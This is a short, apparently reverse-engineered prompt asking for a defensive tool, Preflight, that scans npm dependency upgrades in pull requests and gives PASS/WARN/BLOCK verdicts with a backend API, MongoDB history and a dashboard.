Javeria-taj/preflight-ai — reverse-engineered prompt

Build me Preflight, a security tool that protects JavaScript projects from dangerous package updates before they run.

I want a GitHub Action that scans pull requests when dependencies change, compares the old and new package versions, sends the result to an API, and comments on the PR with a clear PASS, WARN, or BLOCK verdict. If something looks malicious, it should fail the check so the merge is blocked.

Also build the backend API that analyzes package upgrades using install script changes, simple JavaScript static scanning, npm maintainer reputation signals, and Gemini to write a human readable explanation. Save scan history in MongoDB.

Build a dark, SOC style web dashboard where I can see recent scans, verdicts, confidence, top risky packages, and a detailed scan page with the timeline, signals, and AI reasoning.

Please wire the frontend, API, and action together enough to run locally, with clear env setup for MongoDB, Gemini, and the API URL. Look up current docs online if needed.